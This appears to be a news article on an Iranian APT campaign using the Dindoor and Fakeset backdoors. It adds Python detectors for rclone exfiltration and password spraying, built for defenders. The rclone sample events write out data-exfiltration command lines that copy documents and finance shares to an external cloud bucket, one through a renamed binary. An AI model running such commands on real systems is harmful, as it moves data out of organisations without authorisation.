Iran-Linked APT Group Deploys Sophisticated Backdoors to Compromise US Critical Infrastructure
Sophisticated Cyber Espionage Campaign Uncovered
A sophisticated cyber espionage campaign, attributed to an Iranian advanced persistent threat (APT) group, has been uncovered targeting several critical sectors in the United States.
Attribution and History
The group, known as Seedworm or MuddyWater, has been linked to Iran’s Ministry of Intelligence and Security (MOIS) and has a history of conducting espionage campaigns against government agencies, telecommunications companies, and critical infrastructure.
Targets and Methods
Researchers at Symantec and Carbon Black have identified suspicious activity on the networks of a US bank, a US airport, non-profit organizations, and the Israeli operations of a US software company that supplies the defense and aerospace industries.
The activity, which began in early February 2026, has continued into recent days, with the group leveraging previously unknown malware.
The attackers have been using two new backdoors, Dindoor and Fakeset, to gain unauthorized access to targeted networks.
Dindoor is a JavaScript-based backdoor that uses the Deno runtime environment to execute commands on infected machines, while Fakeset is a Python-based backdoor.
Both backdoors were digitally signed with certificates issued to individuals with previously known associations with the Seedworm APT.
Goals and Motivations
The primary goal of the campaign appears to be espionage, with the attackers attempting to exfiltrate data from the targeted software company to a cloud storage bucket hosted by Wasabi using the open-source tool Rclone.
The researchers noted that the group already had a presence on US and Israeli networks before the current hostilities in the region began, which gives it a foothold from which it could launch attacks.
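The exfiltration path described above (rclone pushing data to a Wasabi bucket) leaves a distinctive process-creation footprint. The following is an added detection example written for this page; it is not code from Symantec, Carbon Black or the Seedworm toolset. It assumes Sysmon-style process-creation events with `Image` and `CommandLine` fields, one JSON object per line, and it flags an rclone upload verb aimed at a remote, with higher severity when the endpoint is a known object store. The non-Wasabi endpoints, the renamed-binary heuristic and the sample events are assumptions constructed for the example.

```python
"""Flag rclone executions that push local data to an external object store.

Added example, not vendor code or attacker tooling. Input: constructed,
Sysmon-style process-creation events (JSON per line) with Image and CommandLine.
"""
import json
import re
import shlex
from typing import Iterable, List, Optional

# Hostname patterns of S3-compatible object stores. Wasabi is the provider named
# in the report; the others are assumed additions so the rule survives a change
# of provider by the operator.
OBJECT_STORE_ENDPOINTS = re.compile(
    r"(?:[a-z0-9.-]+\.wasabisys\.com|[a-z0-9.-]+\.amazonaws\.com|"
    r"storage\.googleapis\.com|[a-z0-9.-]+\.blob\.core\.windows\.net)",
    re.I,
)

# rclone subcommands that write to the destination remote.
UPLOAD_VERBS = {"copy", "copyto", "sync", "move", "moveto", "rcat"}

# A remote argument looks like "name:bucket/path" or ":backend:bucket/path".
# A single letter followed by a colon is a Windows drive, not a remote, so a
# named remote must be at least two characters long.
REMOTE_ARG = re.compile(r"^(?::[A-Za-z0-9_-]+|[A-Za-z0-9_-]{2,}):\S*$")

# Flags only rclone understands; used to catch a renamed binary (assumption).
RCLONE_ONLY_FLAGS = re.compile(r"--(?:s3-endpoint|s3-provider|s3-access-key-id|transfers)\b")


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line without treating backslashes as escapes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def classify_rclone_event(event: dict) -> Optional[dict]:
    """Return a finding for an rclone execution, or None for unrelated processes."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    tokens = _tokens(cmdline)
    if not tokens:
        return None

    base = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    named_rclone = base in ("rclone", "rclone.exe")
    verb = next((t for t in tokens[1:] if t.lower() in UPLOAD_VERBS), None)
    looks_rclone = bool(RCLONE_ONLY_FLAGS.search(cmdline)) and verb is not None
    if not (named_rclone or looks_rclone):
        return None

    remotes = [t for t in tokens[1:] if not t.startswith("-") and REMOTE_ARG.match(t)]
    endpoint = OBJECT_STORE_ENDPOINTS.search(cmdline)

    if verb and remotes and endpoint:
        severity = "high"     # upload verb + remote destination + known object store
    elif verb and remotes:
        severity = "medium"   # upload to a remote whose endpoint we do not recognise
    else:
        severity = "low"      # rclone present, but no upload observed in this event

    return {
        "image": image,
        "renamed": not named_rclone,
        "verb": verb,
        "remote": remotes[-1] if remotes else None,
        "endpoint": endpoint.group(0) if endpoint else None,
        "severity": severity,
    }


def scan(lines: Iterable[str]) -> List[dict]:
    """Run the classifier over JSON event lines and collect the findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            finding = classify_rclone_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample events; not telemetry from the reported intrusion.
SAMPLE_EVENTS = [
    json.dumps({"Image": r"C:\Windows\Temp\rclone.exe",
                "CommandLine": r'rclone.exe copy "C:\Users\alice\Documents" :s3:proj-archive/docs '
                               r'--s3-provider Wasabi --s3-endpoint s3.eu-central-1.wasabisys.com --transfers 16'}),
    json.dumps({"Image": r"C:\ProgramData\svchost.exe",   # rclone renamed to blend in
                "CommandLine": r'svchost.exe sync C:\Share\Finance :s3:backup-2026/fin '
                               r'--s3-provider Wasabi --s3-endpoint=s3.wasabisys.com'}),
    json.dumps({"Image": r"C:\Program Files\rclone\rclone.exe",
                "CommandLine": r'rclone.exe lsd corp-backup:'}),
    json.dumps({"Image": r"C:\Windows\System32\robocopy.exe",
                "CommandLine": r'robocopy C:\Data D:\Backup /MIR'}),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["image"], f["verb"], f["remote"], f["endpoint"])
```

The "low" finding for a bare `rclone lsd` is deliberate: an rclone binary on a host that has no business running it is worth a look even before any upload, and the remote name it lists (`corp-backup:`) tells you which configured remote to hunt for in `rclone.conf`.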
Exposure of Infrastructure
An independent threat intelligence research collective, Ctrl-Alt-Intel, recently accessed infrastructure used by Seedworm/MuddyWater, which provided a broad view into the group’s operations.
The exposed infrastructure, hosted in the Netherlands, contained a large body of tooling, scripts, logs and victim data, including:
- Multiple custom-developed command and control (C2) frameworks
- Exploitation of over a dozen CVEs, including novel SQL injection vulnerabilities
- Password spraying campaigns
- Multiple exfiltration channels
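Of the capabilities listed above, password spraying is the one that an identity team can detect from authentication logs alone: many distinct accounts, one or two attempts each, from a single source in a short window, which looks nothing like a lockout-triggering brute force against one account. The following is an added detection example written for this page, not MuddyWater tooling or code from Ctrl-Alt-Intel. It assumes a simple comma-separated record per authentication attempt (`timestamp,source_ip,username,result`); the window size, thresholds and the sample records are assumptions constructed for the example.

```python
"""Detect password spraying in authentication failure records.

Added example, not attacker tooling or vendor code. Input: constructed CSV
lines of the form  timestamp,source_ip,username,result  with result being
"failure" or "success".
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

# Tuning assumptions: a spray is >= MIN_DISTINCT_USERS accounts from one source
# inside WINDOW, with no account tried more than MAX_ATTEMPTS_PER_USER times.
WINDOW = timedelta(minutes=10)
MIN_DISTINCT_USERS = 8
MAX_ATTEMPTS_PER_USER = 2

Event = Tuple[datetime, str, str, str]   # (timestamp, source_ip, user, result)


def parse_events(lines: Iterable[str]) -> List[Event]:
    """Parse CSV records into sorted events; blank and '#' lines are ignored."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, ip, user, result = (p.strip() for p in line.split(","))
        events.append((datetime.fromisoformat(ts), ip, user.lower(), result.lower()))
    return sorted(events)


def detect_spraying(lines: Iterable[str]) -> List[dict]:
    """Return one finding per source IP whose failures match the spray pattern."""
    failures: Dict[str, List[Event]] = defaultdict(list)
    successes: Dict[str, List[Event]] = defaultdict(list)
    for ev in parse_events(lines):
        (failures if ev[3] == "failure" else successes)[ev[1]].append(ev)

    findings = []
    for ip, evs in failures.items():
        for i in range(len(evs)):
            # Sliding window: every failure from this source within WINDOW of evs[i].
            j = i
            while j < len(evs) and evs[j][0] - evs[i][0] <= WINDOW:
                j += 1
            window = evs[i:j]
            per_user = Counter(e[2] for e in window)
            if len(per_user) >= MIN_DISTINCT_USERS and max(per_user.values()) <= MAX_ATTEMPTS_PER_USER:
                window_end = window[-1][0]
                # A success from the same source for a sprayed account, after the
                # spray, is the case that needs an immediate response.
                later_success = sorted({e[2] for e in successes[ip]
                                        if e[2] in per_user and e[0] >= window_end})
                findings.append({
                    "source_ip": ip,
                    "start": window[0][0].isoformat(),
                    "end": window_end.isoformat(),
                    "distinct_users": len(per_user),
                    "attempts": len(window),
                    "later_success": later_success,
                })
                break   # one finding per source is enough for triage
    return findings


def _constructed_log() -> List[str]:
    """Constructed sample records (documentation IP ranges, invented users)."""
    t0 = datetime(2026, 2, 10, 3, 0, 0)
    lines = ["# timestamp,source_ip,username,result"]
    # Spray: one source, twelve accounts, one attempt each, 15 s apart.
    for n in range(12):
        lines.append(f"{(t0 + timedelta(seconds=15 * n)).isoformat()},203.0.113.7,user{n + 1:02d},failure")
    # The spraying source later authenticates successfully as one sprayed account.
    lines.append(f"{(t0 + timedelta(minutes=5)).isoformat()},203.0.113.7,user09,success")
    # Brute force: one source hammering one account; not a spray by this rule.
    for n in range(15):
        lines.append(f"{(t0 + timedelta(seconds=5 * n)).isoformat()},198.51.100.20,alice,failure")
    # Benign: a user mistypes twice, then logs in.
    lines.append(f"{t0.isoformat()},192.0.2.5,bob,failure")
    lines.append(f"{(t0 + timedelta(seconds=20)).isoformat()},192.0.2.5,bob,failure")
    lines.append(f"{(t0 + timedelta(seconds=40)).isoformat()},192.0.2.5,bob,success")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for f in detect_spraying(SAMPLE_LOG):
        print(f)
```

In production the source key should usually be the source IP plus the user agent or client ID, since sprays against cloud identity providers are often spread across a proxy pool; the brute-force case is excluded on purpose because lockout policies already handle it, and the `later_success` field is what turns the finding from a hygiene alert into an incident.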
Conclusion
The discovery of this campaign highlights the ongoing threat posed by Iranian APT groups and the need for organizations to remain vigilant in their cybersecurity efforts.
